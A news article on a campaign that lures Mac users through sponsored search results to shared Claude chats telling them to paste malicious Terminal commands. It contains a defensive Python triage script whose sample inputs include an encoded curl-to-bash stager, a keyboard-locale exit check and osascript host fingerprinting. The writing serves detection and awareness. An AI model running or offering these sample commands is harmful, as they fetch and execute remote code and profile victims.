Mac users face Claude malware trap

Mac users searching for Claude downloads are being targeted through sponsored Google results that lead to legitimate-looking Claude shared chats carrying malicious installation instructions, exposing a weakness in how trusted platforms can be misused to deliver malware.

The campaign centres on users looking for Claude or Claude Code for macOS. Instead of relying only on fake websites, the attackers are placing paid search ads that display the claude.ai domain and then direct users to publicly shared Claude conversations. Those pages present themselves as installation guides, sometimes using language designed to resemble official support material, and urge users to open Terminal and paste a command.

That single step is the heart of the attack. The command retrieves encoded scripts from attacker-controlled servers and executes them on the victim’s Mac. Security researchers tracking the campaign found that the payload can run largely in memory, reducing the visible traces left on the device and making the infection harder for ordinary users to spot.

The tactic reflects a shift in malware delivery aimed at developers, creators and business users adopting artificial intelligence tools. Claude Code, Anthropic’s terminal-based coding assistant, is used by developers to work across codebases, automate tasks and manage programming workflows. That makes it an attractive lure because installation guides for developer tools often involve copying commands into Terminal, a practice attackers can exploit.

Investigators have identified more than one variant of the campaign. One version has been linked to a MacSync-style infostealer capable of collecting browser credentials, cookies and macOS Keychain data. Another observed variant gathers information about the victim’s machine, including external IP address, hostname, operating system details and keyboard locale, before attempting to fetch additional payloads.

The malware chain also appears to screen victims before proceeding. One variant checks for Russian or Commonwealth of Independent States keyboard input sources and exits if they are present, a filtering technique seen in several criminal malware operations. Machines that pass the check can receive further instructions through macOS scripting tools, giving attackers a path to remote code execution without presenting the victim with a conventional application installer.
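The command-paste step described earlier and the locale and host checks in the later variants share one shape: a Terminal one-liner that fetches or decodes a stage and hands it to an interpreter. The following Python script is an added example written for this article, not code from the reported campaign, from Anthropic or from any security vendor. It triages such a command before it is run, scoring indicators such as a remote fetch piped into a shell, a base64 decode step, a keyboard input-source or locale lookup and host fingerprinting, and it decodes any embedded base64 so the reader can see what the next stage would be. The indicator names, weights, thresholds and sample commands are constructed assumptions, and the hostnames use the reserved .invalid domain.

```python
"""Triage a "paste this into Terminal" command before running it.

Added example written for this article; it is not code from the reported
campaign, from Anthropic, or from any vendor. Indicator names, weights and
the sample commands are constructed for illustration, and the patterns are
a starting point for a practitioner's own rules, not a complete detector.
"""
import base64
import re

# (name, weight, pattern). Weights are an assumption chosen so that any
# fetch-or-decode-to-interpreter pattern on its own reaches "high".
INDICATORS = [
    # Remote fetch piped straight into a shell or other interpreter.
    ("remote-fetch-piped-to-interpreter", 5, re.compile(
        r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(bash|sh|zsh|python3?|perl|osascript)\b")),
    # Fetch inside command substitution: bash -c "$(curl ...)" / eval "$(wget ...)".
    ("fetch-in-command-substitution", 5, re.compile(
        r"\b(eval|bash|sh|zsh)\s+(-c\s+)?[\"']?\$\(\s*(curl|wget)\b")),
    # An encoded stage decoded and executed in the same pipeline.
    ("decoded-stage-piped-to-interpreter", 5, re.compile(
        r"base64\s+(-d|-D|--decode)\b[^|\n]*\|\s*(sudo\s+)?(bash|sh|zsh)\b")),
    # Any base64 decode step at all (-D is the spelling also accepted on macOS).
    ("base64-decode-in-pipeline", 3, re.compile(r"base64\s+(-d|-D|--decode)\b")),
    # Keyboard/locale lookup of the kind used to skip Russian/CIS victims.
    ("keyboard-locale-check", 3, re.compile(
        r"AppleEnabledInputSources|AppleSelectedInputSources|AppleLocale|com\.apple\.HIToolbox")),
    # Host fingerprinting: OS version, hostname, external IP lookups.
    ("host-fingerprinting", 2, re.compile(
        r"\bsw_vers\b|\bhostname\b|\bscutil\b|ifconfig\.me|ipinfo\.io|api\.ipify\.org")),
    # macOS scripting tool that gives a remote operator a code-execution path.
    ("macos-scripting-tool", 2, re.compile(r"\bosascript\b")),
    # Output suppressed or detached so the user sees less.
    ("output-hidden-or-detached", 1, re.compile(r">\s*/dev/null|\bnohup\b|2>&1")),
]

# A long unbroken run of base64 alphabet: a candidate embedded stage.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blobs(text):
    """Return the plaintext of each base64 run in `text` that decodes to printable ASCII."""
    stages = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            plain = raw.decode("ascii")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in plain):
            stages.append(plain)
    return stages


def assess(command, depth=0, max_depth=3):
    """Score `command`, then decode and score any embedded stages recursively.

    Returns {"score", "reasons", "decoded"}; "decoded" lists the plaintext of
    embedded stages so the reader can see what would run after `base64 -d`.
    """
    score, reasons, decoded = 0, [], []
    for name, weight, rx in INDICATORS:
        if rx.search(command):
            score += weight
            reasons.append(name)
    if depth < max_depth:
        for stage in decode_blobs(command):
            inner = assess(stage, depth + 1, max_depth)
            score += inner["score"]
            reasons.extend(f"stage{depth + 1}:{r}" for r in inner["reasons"])
            decoded.append(stage)
            decoded.extend(inner["decoded"])
    return {"score": score, "reasons": reasons, "decoded": decoded}


def risk_level(command):
    """Map the score to low / medium / high (thresholds are an assumption)."""
    score = assess(command)["score"]
    return "high" if score >= 5 else "medium" if score >= 2 else "low"


# Constructed samples for illustration. Hostnames use the reserved .invalid TLD.
BENIGN_SAMPLE = "brew install --cask example-app"
STAGE2 = "curl -fsSL https://example.invalid/stage2.sh | bash >/dev/null 2>&1"
MAL_SAMPLE = "echo " + base64.b64encode(STAGE2.encode()).decode() + " | base64 -d | bash"
FINGERPRINT_SAMPLE = (
    "defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources"
    " | grep -q -E 'Russian|Ukrainian' && exit 0\n"
    "osascript -e 'do shell script \"sw_vers; hostname; curl -s https://api.ipify.org\"'"
)

if __name__ == "__main__":
    for label, cmd in [("benign", BENIGN_SAMPLE), ("encoded", MAL_SAMPLE),
                       ("fingerprint", FINGERPRINT_SAMPLE)]:
        report = assess(cmd)
        print(f"{label}: {risk_level(cmd)} (score {report['score']})")
        for reason in report["reasons"]:
            print("  -", reason)
        for stage in report["decoded"]:
            print("  decoded stage:", stage)
```

Run it directly to see each sample's score, the reasons and the decoded second stage hidden inside the encoded command. One caveat matters in practice: at least one widely used package manager's own official installer is a `bash -c "$(curl ...)"` one-liner and would score high here, so a high score means "verify the source before running", not "certainly malicious". That is the article's point as well: neither the shape of the command nor a familiar domain in a search result is enough on its own.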

The use of legitimate Claude shared-chat pages complicates the normal security advice given to users. A suspicious domain is often a warning sign, but this campaign benefits from the presence of a real claude.ai address in the search result. The malicious content is not an official Anthropic page; it is user-generated material hosted through a sharing feature. That distinction may be clear to security professionals, but it is easily missed by users who arrive from a sponsored result and see a familiar domain.

The campaign follows a broader pattern of cybercriminals abusing demand for AI tools. Fake Claude installers for Windows have also circulated, including malicious packages that mimic a working Claude client while deploying loader malware and backdoor components. Other campaigns have impersonated AI developer tools and open-source repositories to distribute infostealers targeting browsers, crypto wallets, session cookies and development environments.

For businesses, the risk is greater than the compromise of a single laptop. Developers often store API keys, cloud credentials, private repository access tokens and internal documentation on their workstations. A successful infection can therefore become a gateway to source code theft, unauthorised cloud access or follow-on attacks against corporate systems.

The official Claude Code installation route relies on verified documentation and trusted package sources, not commands copied from sponsored ads or shared chats. Users should navigate directly to official Anthropic pages, check documentation carefully, avoid instructions attributed to unrelated brands such as “Apple Support” on third-party or user-generated pages, and treat any Terminal command that downloads and executes remote code as high risk.



Notice an issue?

Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com. We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.
